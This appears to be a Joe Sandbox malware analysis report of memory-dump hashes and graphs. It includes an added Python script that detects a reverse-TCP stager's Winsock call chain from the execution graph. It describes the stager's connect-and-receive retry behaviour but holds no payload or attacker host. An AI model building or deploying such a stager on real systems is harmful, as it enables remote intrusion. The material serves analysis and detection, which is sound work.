
                  Memory Dump Source
                  • Source File: 00000000.00000002.565956694.00007FF816250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816250000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff816250000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d09eb17cea7e2ef254ae21c613752721cdc0e73fa53e6d38b2cbcb32cb7a1958
                  • Instruction ID: 67f1eeb555f8449f35958a1b257c2c7bc82851852a6387d11f44cf04dde8068d
                  • Opcode Fuzzy Hash: d09eb17cea7e2ef254ae21c613752721cdc0e73fa53e6d38b2cbcb32cb7a1958
                  • Instruction Fuzzy Hash: BCD02E3288CBCD0FCB02ABB00C010DA7F20EE02250F0803EBE499C3043CAAC82188383
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID: Zr9s$Zr9s$jt9s
                  • API String ID: 0-456592187
                  • Opcode ID: 975f6bf1faaec5898c1c4381e227e6b4fdf0a01eedacc91b5f4dd2e7976c2e99
                  • Instruction ID: 81242ac4c817c24658aed5e16afa34891d1606072f12305c36435b0071d04524
                  • Opcode Fuzzy Hash: 975f6bf1faaec5898c1c4381e227e6b4fdf0a01eedacc91b5f4dd2e7976c2e99
                  • Instruction Fuzzy Hash: DA917D25B79AC60BE31E9A7858492B13BD5EF8736BF2846BDC4C7C35C7D928A4434381
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID: jt9s
                  • API String ID: 0-3786384843
                  • Opcode ID: ffe0b3eec556dbf67db07d70b8883733971a20e6d465a37d9c060cd903f6fd65
                  • Instruction ID: 39f9802a2bf70f626c0e42fbba7c4de1d265e13e1e560776354bfb49fa8e93fa
                  • Opcode Fuzzy Hash: ffe0b3eec556dbf67db07d70b8883733971a20e6d465a37d9c060cd903f6fd65
                  • Instruction Fuzzy Hash: C9612621B1DA490FE785FB7C445A779B7C1EF992A1B1402BED08EC3293DC2CAC828351
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID: jt9s
                  • API String ID: 0-3786384843
                  • Opcode ID: 19fa0ab0d926cc3707055278fd5136527e63eb3ceb0be277b5415cf052e50721
                  • Instruction ID: 4fa78d61f7837a769684ac9dcfb7598bfbeb6b8f4a70c05b9dd0b4284c1da65f
                  • Opcode Fuzzy Hash: 19fa0ab0d926cc3707055278fd5136527e63eb3ceb0be277b5415cf052e50721
                  • Instruction Fuzzy Hash: EE419222B28D494FE784FB6C449A77977C2EF9C7A1B14057ED08EC3297DD28AC824745
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 450fe86a4af1a19255a21ed45a513c69e942de354fc815a1e8377ed755a39574
                  • Instruction ID: 2d843a55406207b8bd39ecf823d06bc2a37fc0fd741f426d3a8d145a2c3c4fee
                  • Opcode Fuzzy Hash: 450fe86a4af1a19255a21ed45a513c69e942de354fc815a1e8377ed755a39574
                  • Instruction Fuzzy Hash: 3F61DF71919A498FDB45EB68C8566ECFBF0FF49360F1441BAD449D7292CE386842CB81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3d77aeee614a5f2e09c6c946fdcede7d842f0b39c79702c9b7e6634d5e1a7ee5
                  • Instruction ID: 01a2c5b75e3dac6d13c01c67e2cb740f3ab46dfde527db13ffa92973db3c56ec
                  • Opcode Fuzzy Hash: 3d77aeee614a5f2e09c6c946fdcede7d842f0b39c79702c9b7e6634d5e1a7ee5
                  • Instruction Fuzzy Hash: 2551CF71A19A498FDB45EB68C8566ECFBF0FF49360F5042BAD44DD7292CE346842CB81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eb99f22b5f754b4acf4d992027e8f73e9577e7d55656c171154b4df8699b94ad
                  • Instruction ID: 5c8552dd6893f0e30e50bb6473b61aef1fca2d8b291849eadf9267a63d97dc1d
                  • Opcode Fuzzy Hash: eb99f22b5f754b4acf4d992027e8f73e9577e7d55656c171154b4df8699b94ad
                  • Instruction Fuzzy Hash: B921E66595E6C56FD353A77458686B27FE8DF47272B1841EBE0C8C70A7D40D084AC353
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6c4b9b43a8c92d69821b8dce1f4a67a0a4ecdbd9f6da364928777b4f30f921f0
                  • Instruction ID: eeb963d4e56c9cc39863aa4405fb623259aaee289e9702a29aa09189fbfd6bb2
                  • Opcode Fuzzy Hash: 6c4b9b43a8c92d69821b8dce1f4a67a0a4ecdbd9f6da364928777b4f30f921f0
                  • Instruction Fuzzy Hash: 1711D332A1891C4FAB40FB6CE84D9EABBE4FB5D375B00027BE81DD3161EA31A4518790
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d9eb0117cb1b375810d8aca3b9ed3689886afb16ecd496ebafb23b28151b1fe2
                  • Instruction ID: 58cefe60d7c8a05dd142f62f07863dcbfc07d09eb7baca2b6d1e2fb81b65e9da
                  • Opcode Fuzzy Hash: d9eb0117cb1b375810d8aca3b9ed3689886afb16ecd496ebafb23b28151b1fe2
                  • Instruction Fuzzy Hash: 7811D731B189098FDB84EB68C055BFDB7A2FF58351F600279D14EE7292DE39A881CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c6f2c8d4eb98e96d34d06c1538a75587eb319e405c27696468efc5e16637d0be
                  • Instruction ID: 904f7945f09a68f00ca30cba96426bc66a0fb6608ad4039bfe116f419c9b9c8a
                  • Opcode Fuzzy Hash: c6f2c8d4eb98e96d34d06c1538a75587eb319e405c27696468efc5e16637d0be
                  • Instruction Fuzzy Hash: 9401C411B29A464FE795FA3C48153B9A2C1AF987A1B4045BDC40EC36D3DC2DA8854741
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 335f3acb82a9297c79f63ae6d654e36ff8e9d934591864c673421a6ec2f6621a
                  • Instruction ID: d8101d52ea623499bdbff5d7a34153f831b4122a95b270ae2384f940ff720093
                  • Opcode Fuzzy Hash: 335f3acb82a9297c79f63ae6d654e36ff8e9d934591864c673421a6ec2f6621a
                  • Instruction Fuzzy Hash: 84F0FF23B2CA094BE708AB2CA4533F9E7C2EF893A0B5010BAD14EC32C3CD2968814241
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: adadef773b054f4985a8257fe567cca9eb53e878ac62704622bfb8ada85e10ff
                  • Instruction ID: f0e7198d04f29211f8d8699162f376bb4f4289f85c7a25725ae8673c602bcda1
                  • Opcode Fuzzy Hash: adadef773b054f4985a8257fe567cca9eb53e878ac62704622bfb8ada85e10ff
                  • Instruction Fuzzy Hash: 30F0687285EBC94FD7939F7448211D97F70EF46261F4A02E7D488CB493DA1C9944C752
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4c30b2b293a904d7ada8cad2aed65b213ee68702d056b21bf9960bd003461e00
                  • Instruction ID: a08922ca91368301fc31fdecaf36a3ed0a0e557c6cf78f9dfaea841a7a7ff7eb
                  • Opcode Fuzzy Hash: 4c30b2b293a904d7ada8cad2aed65b213ee68702d056b21bf9960bd003461e00
                  • Instruction Fuzzy Hash: ADE06D31729E094FE781F73D88257A8B2D6EF8835178140B9E40DC72A2DD6DDC828B02
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3b8cf2b9e1adcdfecd1366f8e80550bde8013258bb6755d79658fe0ff3b85ddf
                  • Instruction ID: a273d543d43654cf50925ca39022a77fcdb2509a8bd263e71ed083037c938536
                  • Opcode Fuzzy Hash: 3b8cf2b9e1adcdfecd1366f8e80550bde8013258bb6755d79658fe0ff3b85ddf
                  • Instruction Fuzzy Hash: 0CE02230D08B4C8FCB41EF58E408AE8BBA4FF8936AF1801AED00CC30A2C2325884C741
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1143904485dadc011f713d69fb7467c48c710404275930afa5e3f5515047dc10
                  • Instruction ID: a26a1e4e5517379b17e422597ef85b4a0115c7ccd471738ff67cc977cbc209c4
                  • Opcode Fuzzy Hash: 1143904485dadc011f713d69fb7467c48c710404275930afa5e3f5515047dc10
                  • Instruction Fuzzy Hash: EAF030306099499FDB81EB68C855E6D77E1FF5931074045A89009CB2A5CA28AC42CB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c1cbd43ea0ed5392c4f5100fd1d6d35c5d88dc353c181d0dd85971709340c628
                  • Instruction ID: 9ace97bd9d208bc47c4b1aaf9d4a687880ad643290176fe0dc6ee9f1d8aaaa8c
                  • Opcode Fuzzy Hash: c1cbd43ea0ed5392c4f5100fd1d6d35c5d88dc353c181d0dd85971709340c628
                  • Instruction Fuzzy Hash: 07E0DF20328A864FE346EB38C021BA6FAC1AF51380F0480B8904DC76E2CE69A8488780
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2ccc456b6d6ae0b66015e6df321dd7ccfce2c815b71cee3572a5355d1151ca04
                  • Instruction ID: 707f0cdbbc3695caad2cbb5460ccf720cbf9967f6614d2d5eae61d8e8c36cc4a
                  • Opcode Fuzzy Hash: 2ccc456b6d6ae0b66015e6df321dd7ccfce2c815b71cee3572a5355d1151ca04
                  • Instruction Fuzzy Hash: F2E0C232C8DBCD4EDB529B7408110E97F60EF02150F4806DBE49C87443D55C51588392
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: daaa864d9ff921161bba98f978928421e53d29a43f27536bd68c8e76eea2839e
                  • Instruction ID: 0f8bdfd0c30a4bb7afe3e3bc6fae8907ad7eb68dbbf20d6cfc810e164f33125d
                  • Opcode Fuzzy Hash: daaa864d9ff921161bba98f978928421e53d29a43f27536bd68c8e76eea2839e
                  • Instruction Fuzzy Hash: 1BD05E116699490FE387F238041A3AD50C2DB4869134440B9D81DC32D2CD5D58830382
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Execution Graph

                  Execution Coverage:28.4%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:85.7%
                  Total number of Nodes:7
                  Total number of Limit Nodes:1
execution_graph (Graphviz source, flattened in the export; node id, address, APIs called in that block):
• 52: 140004000 (entry)
• 55: 1400040d6 LoadLibraryA, WSAStartup
• 56: 14000411f WSASocketA
• 57: 14000413e connect
• 58: 14000415e recv
• 59: 140004154
• 60: 140004222 (self-loop; the one limit node)
• Edges: 52->55, 55->56, 56->57, 57->58, 57->59, 58->59, 59->56, 59->57, 59->58, 59->60, 60->60
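
The execution_graph line is Graphviz source that the report normally renders as a picture; read as text it encodes the whole stager: load ws2_32 and initialise Winsock, create a socket, connect, then recv in a loop with paths back to the socket/connect blocks when something fails. As an added example (not part of the Joe Sandbox report, nor Joe Sandbox or Metasploit code), the following Python parses that line, recovers the API call order by address, and checks for the chain behind the report's API ID 'LibraryLoadSocketStartupconnectrecv'. The node ids, addresses and edges are copied from the report; treating a self-loop as a "limit node" and the ordered-subsequence stager check are this example's own heuristics.

```python
"""Parse the flattened Joe Sandbox execution_graph line and recover the
stager's API call chain. Added example: EXECUTION_GRAPH is copied from the
report's 'Execution Graph' section; the parsing and the stager-chain check
are this example's own logic, not Joe Sandbox or Metasploit code."""
import re
from collections import defaultdict

# Graphviz source as the report flattens it: "<id> <hexaddr> [API ...]" node
# records interleaved with "<a>-><b>" edges (copied from the report above).
EXECUTION_GRAPH = (
    "execution_graph 52 140004000 55 1400040d6 LoadLibraryA WSAStartup 52->55 "
    "56 14000411f WSASocketA 55->56 57 14000413e connect 56->57 "
    "58 14000415e recv 57->58 59 140004154 57->59 58->59 59->56 59->57 "
    "59->58 60 140004222 59->60 60->60"
)

# Reverse-TCP stager sequence behind the report's API ID
# 'LibraryLoadSocketStartupconnectrecv' (this example's own list).
STAGER_CHAIN = ["LoadLibraryA", "WSAStartup", "WSASocketA", "connect", "recv"]

_EDGE = re.compile(r"^(\d+)->(\d+)$")
_ADDR = re.compile(r"^[0-9a-fA-F]{8,16}$")   # node ids are short decimals


def parse_execution_graph(text):
    """Return (nodes, edges). nodes: id -> {'addr': int, 'apis': [str]};
    edges: id -> set of successor ids."""
    tokens = text.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    nodes, edges = {}, defaultdict(set)
    current, i = None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = _EDGE.match(tok)
        if edge:
            edges[int(edge.group(1))].add(int(edge.group(2)))
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and _ADDR.match(tokens[i + 1]):
            current = int(tok)
            nodes[current] = {"addr": int(tokens[i + 1], 16), "apis": []}
            i += 2
        elif current is None:
            raise ValueError(f"API name {tok!r} before any node record")
        else:
            nodes[current]["apis"].append(tok)   # API called in this block
            i += 1
    for a, succ in edges.items():
        if a not in nodes or not succ.issubset(nodes):
            raise ValueError(f"edge from {a} references an unknown node")
    return nodes, edges


def entry_node(nodes):
    """Lowest address: the function start the graph was built from."""
    return min(nodes, key=lambda n: nodes[n]["addr"])


def reachable(edges, entry):
    seen, stack = set(), [entry]
    while stack:
        n = stack.pop()
        if n not in seen:
            seen.add(n)
            stack.extend(edges.get(n, ()))
    return seen


def api_chain(nodes, edges, entry):
    """API names of reachable blocks in address (i.e. code) order."""
    order = sorted(reachable(edges, entry), key=lambda n: nodes[n]["addr"])
    return [api for n in order for api in nodes[n]["apis"]]


def limit_nodes(edges):
    """Self-looping blocks; Joe Sandbox counts these as 'Limit Nodes'."""
    return sorted(n for n, succ in edges.items() if n in succ)


def back_edges(nodes, edges):
    """Edges to a lower address: the retry paths (recv -> check block,
    check block -> WSASocketA / connect again)."""
    return sorted((a, b) for a, succ in edges.items() for b in succ
                  if a != b and nodes[b]["addr"] < nodes[a]["addr"])


def is_reverse_tcp_stager(nodes, edges, entry):
    """True when STAGER_CHAIN occurs, in order, within the reachable API calls."""
    calls = iter(api_chain(nodes, edges, entry))
    return all(any(api == want for api in calls) for want in STAGER_CHAIN)


def summarize(text=EXECUTION_GRAPH):
    nodes, edges = parse_execution_graph(text)
    entry = entry_node(nodes)
    return {
        "nodes": len(nodes),
        "limit_nodes": limit_nodes(edges),
        "api_chain": api_chain(nodes, edges, entry),
        "back_edges": back_edges(nodes, edges),
        "reverse_tcp_stager": is_reverse_tcp_stager(nodes, edges, entry),
    }


if __name__ == "__main__":
    for key, value in summarize().items():
        print(f"{key}: {value}")
```

On the report's own graph this recovers 7 nodes and a single limit node (60), matching the counts the report prints, and the API chain LoadLibraryA, WSAStartup, WSASocketA, connect, recv. The back edges 58->59, 59->56 and 59->57 are the stager's retry behaviour: after recv returns, a check block decides whether to recv again or to tear down and redo the socket/connect, which is why the sandbox saw the process sit in a loop rather than exit.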

                  Callgraph

                  • Executed
                  • Not Executed
                  • Opacity -> Relevance
                  • Disassembly available
callgraph (flattened in the export; node id, function, then call edges):
• 0: Function_0000000140004225
• 1: Function_00000001400040D6
• 2: Function_0000000140004000
• Edges: 2->1, 1->0 (Function_0000000140004000 calls Function_00000001400040D6, which calls Function_0000000140004225)

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.811405642.0000000140004000.00000080.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                  • Associated: 0000000A.00000002.811398141.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_140000000_s1szwqo5.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoadSocketStartupconnectrecv
                  • String ID: unMa$ws2_32
                  • API String ID: 663999256-2325342229
                  • Opcode ID: 264c2c4afcd7f78c8d081639a72e3a4682661b69b9cba304066add0613ded0a9
                  • Instruction ID: ecfa5dd91f7c48ba60cf5922183fa9059d23bfe7db670abbff6e0034d4f4ea65
                  • Opcode Fuzzy Hash: 264c2c4afcd7f78c8d081639a72e3a4682661b69b9cba304066add0613ded0a9
                  • Instruction Fuzzy Hash: 634128E334918815F7635A733C567F95A40976EFE4F8C4021AF494B3D3D4A885CA8209
                  Uniqueness

                  Uniqueness Score: -1.00%